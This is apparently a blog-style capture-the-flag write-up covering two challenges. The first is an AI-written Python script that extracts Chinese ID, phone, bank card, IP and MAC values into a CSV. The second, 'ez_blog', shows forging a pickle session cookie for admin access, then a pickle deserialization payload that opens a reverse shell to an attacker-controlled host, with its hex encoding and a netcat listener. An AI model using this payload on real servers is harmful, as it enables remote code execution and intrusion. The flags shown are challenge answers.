dataIdSort We provided the requirements to AI and had it write a script: #!/usr/bin/env python3 # coding: utf-8 """ 功能: - 从 data.txt 中按顺序精确提取:身份证(idcard)、手机号(phone)、银行卡(bankcard)、IPv4(ip)、MAC(mac)。 - 严格遵循《个人信息数据规范文档》,优化正则表达式和匹配策略以达到高准确率。 - 所有匹配项均保留原始格式,并输出到 output.csv 文件中。 """ import re import csv from datetime import datetime # ------------------- 配置 ------------------- INPUT_FILE = "data.txt" OUTPUT_FILE = "output.csv" DEBUG = False # 设置为 True 以在控制台打印详细的接受/拒绝日志 # 手机号前缀白名单 ALLOWED_MOBILE_PREFIXES = { "134", "135", "136", "137", "138", "139", "147", "148", "150", "151", "152", "157", "158", "159", "172", "178", "182", "183", "184", "187", "188", "195", "198", "130", "131", "132", "140", "145", "146", "155", "156", "166", "167", "171", "175", "176", "185", "186", "196", "133", "149", "153", "173", "174", "177", "180", "181", "189", "190", "191", "193", "199" } # --------------------------------------------- # ------------------- 校验函数 ------------------- def luhn_check(digits: str) -> bool: """对数字字符串执行Luhn算法校验。""" s = 0 alt = False for char in reversed(digits): d = int(char) if alt: d *= 2 if d > 9: d -= 9 s += d alt = not alt return s % 10 == 0 def is_valid_id(raw: str): """校验身份证号的有效性(长度、格式、出生日期、校验码)。""" sep_pattern = r'[\s\-\u00A0\u3000\u2013\u2014]' s = re.sub(sep_pattern, '', raw) if len(s) != 18 or not re.match(r'^\d{17}[0-9Xx]$', s): return False, "无效的格式或长度" try: birth_date = datetime.strptime(s[6:14], "%Y%m%d") if not (1900 <= birth_date.year <= datetime.now().year): return False, f"无效的出生年份: {birth_date.year}" except ValueError: return False, "无效的出生日期" weights = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2] check_map = ['1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2'] total = sum(int(digit) * weight for digit, weight in zip(s[:17], weights)) expected_check = check_map[total % 11] if s[17].upper() != expected_check: return False, f"校验码不匹配: 期望值 {expected_check}" return True, "" def is_valid_phone(raw: str) -> bool: """校验手机号的有效性(长度和号段)。""" digits = re.sub(r'\D', '', raw) if digits.startswith("86") and len(digits) > 11: digits = digits[2:] return len(digits) == 11 and digits[:3] in ALLOWED_MOBILE_PREFIXES def is_valid_bankcard(raw: str) -> bool: """校验银行卡号的有效性(16-19位纯数字 + Luhn算法)。""" if not (16 <= len(raw) <= 19 and raw.isdigit()): return False return luhn_check(raw) def is_valid_ip(raw: str) -> bool: """校验IPv4地址的有效性(4个0-255的数字,不允许前导零)。""" parts = raw.split('.') if len(parts) != 4: return False # 检查是否存在无效部分,如 '01' if any(len(p) > 1 and p.startswith('0') for p in parts): return False return all(p.isdigit() and 0 <= int(p) <= 255 for p in parts) def is_valid_mac(raw: str) -> bool: """校验MAC地址的有效性。""" # 正则表达式已经非常严格,这里仅做最终确认 return re.fullmatch(r'([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}', raw, re.IGNORECASE) is not None # ------------------- 正则表达式定义 ------------------- # 模式的顺序经过精心设计,以减少匹配歧义:优先匹配格式最特殊的。 # 1. MAC地址:格式明确,使用冒号分隔。 mac_pattern = r'(?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})' # 2. IP地址:格式明确,使用点分隔。该正则更精确,避免匹配如 256.1.1.1 的无效IP。 ip_pattern = r'(?P<ip>(?<!\d)(?:(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)\.){3}(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(?!\d))' # 3. 身份证号:结构为 6-8-4,长度固定,比纯数字的银行卡更具特异性。 sep = r'[\s\-\u00A0\u3000\u2013\u2014]' id_pattern = rf'(?P<id>(?<!\d)\d{{6}}(?:{sep}*)\d{{8}}(?:{sep}*)\d{{3}}[0-9Xx](?!\d))' # 4. 银行卡号:匹配16-19位的连续数字。这是最通用的长数字模式之一,放在后面匹配。 bankcard_pattern = r'(?P<bankcard>(?<!\d)\d{16,19}(?!\d))' # 5. 手机号:匹配11位数字的特定格式,放在最后以避免错误匹配更长数字串的前缀。 phone_prefix = r'(?:\(\+86\)|\+86\s*)' phone_body = r'(?:\d{11}|\d{3}[ -]\d{4}[ -]\d{4})' phone_pattern = rf'(?P<phone>(?<!\d)(?:{phone_prefix})?{phone_body}(?!\d))' # 将所有模式编译成一个大的正则表达式 combined_re = re.compile( f'{mac_pattern}|{ip_pattern}|{id_pattern}|{bankcard_pattern}|{phone_pattern}', flags=re.UNICODE | re.IGNORECASE ) # ------------------- 主逻辑 ------------------- def extract_from_text(text: str): """ 使用单一的、组合的正则表达式从文本中查找所有候选者,并逐一校验。 """ results = [] for match in combined_re.finditer(text): kind = match.lastgroup value = match.group(kind) if kind == 'mac': if is_valid_mac(value): if DEBUG: print(f"【接受 mac】: {value}") results.append(('mac', value)) elif DEBUG: print(f"【拒绝 mac】: {value}") elif kind == 'ip': if is_valid_ip(value): if DEBUG: print(f"【接受 ip】: {value}") results.append(('ip', value)) elif DEBUG: print(f"【拒绝 ip】: {value}") elif kind == 'id': is_valid, reason = is_valid_id(value) if is_valid: if DEBUG: print(f"【接受 idcard】: {value}") results.append(('idcard', value)) else: # 降级处理:如果作为身份证校验失败,则尝试作为银行卡校验 digits_only = re.sub(r'\D', '', value) if is_valid_bankcard(digits_only): if DEBUG: print(f"【接受 id->bankcard】: {value}") # 规范要求保留原始格式 results.append(('bankcard', value)) elif DEBUG: print(f"【拒绝 id】: {value} (原因: {reason})") elif kind == 'bankcard': if is_valid_bankcard(value): if DEBUG: print(f"【接受 bankcard】: {value}") results.append(('bankcard', value)) elif DEBUG: print(f"【拒绝 bankcard】: {value}") elif kind == 'phone': if is_valid_phone(value): if DEBUG: print(f"【接受 phone】: {value}") results.append(('phone', value)) elif DEBUG: print(f"【拒绝 phone】: {value}") return results def main(): """主函数:读取文件,执行提取,写入CSV。""" try: with open(INPUT_FILE, "r", encoding="utf-8", errors="ignore") as f: text = f.read() except FileNotFoundError: print(f"错误: 输入文件 '{INPUT_FILE}' 未找到。请确保该文件存在于脚本运行目录下。") # 创建一个空的data.txt以确保脚本可以运行 with open(INPUT_FILE, "w", encoding="utf-8") as f: f.write("") print(f"已自动创建空的 '{INPUT_FILE}'。请向其中填充需要分析的数据。") text = "" extracted_data = extract_from_text(text) with open(OUTPUT_FILE, "w", newline="", encoding="utf-8") as csvfile: writer = csv.writer(csvfile) writer.writerow(["category", "value"]) writer.writerows(extracted_data) print(f"分析完成。共识别 {len(extracted_data)} 条有效敏感数据。结果已保存至 '{OUTPUT_FILE}'。") if __name__ == "__main__": main() Execution produces export.csv. Uploading this with accuracy >=98% yields the Flag: DASCTF{34164200333121342836358909307523} ez_blog Opening the webpage revealed a login requirement. Following hints, we successfully logged in as a guest using username guest and password guest. We observed a Cookie containing Token=8004954b000000000000008c03617070948c04557365729493942981947d94288c026964944b028c08757365726e616d65948c056775657374948c0869735f61646d696e94898c096c6f676765645f696e948875622e. AI analysis revealed this was pickle serialization converted to hex. Decoding showed: KappUser)}(idusernameguesis_admin logged_inub.. We modified the content to change username to admin and is_admin to True, resulting in: 8004954b000000000000008c03617070948c04557365729493942981947d9428 8c026964944b028c08757365726e616d65948c0561646d696e948c0869735f61 646d696e94888c096c6f676765645f696e948875622e. Modifying the request Cookies via BurpSuite successfully granted admin privileges (with article creation rights): This indicated the server deserializes the Token, allowing exploitation of deserialization vulnerabilities. With no echo, we opted for a reverse shell. We crafted the Payload: import pickle import time import binascii import os class Exploit: def __reduce__(self): return (os.system, ('''python3 -c "import os import socket import subprocess s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('<Your IP>', 2333)) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) p = subprocess.call(['/bin/sh', '-i'])"''',)) payload = pickle.dumps(Exploit()) hex_token = binascii.hexlify(payload).decode() print(hex_token) print(payload) obj = pickle.loads(payload) Execution produced the Payload: 80049510010000000000008c05706f736978948c0673797374656d9493948cf5707974686f6e33202d632022696d706f7274206f730a696d706f727420736f636b65740a696d706f72742073756270726f636573730a733d736f636b65742e736f636b657428736f636b65742e41465f494e45542c20736f636b65742e534f434b5f53545245414d290a732e636f6e6e6563742828273c596f75722049503e272c203233333329290a6f732e6475703228732e66696c656e6f28292c2030290a6f732e6475703228732e66696c656e6f28292c2031290a6f732e6475703228732e66696c656e6f28292c2032290a70203d2073756270726f636573732e63616c6c285b272f62696e2f7368272c20272d69275d292294859452942e. After running nc -lvvp 2333 on our server and sending the Payload as the Token, we successfully obtained a shell. The Flag was located in /thisisthefffflllaaaggg.txt: Flag: DASCTF{15485426979172729258466667411440}
12/10/2025
415 Views
0 Comments
3 Stars
1
2
3
...
7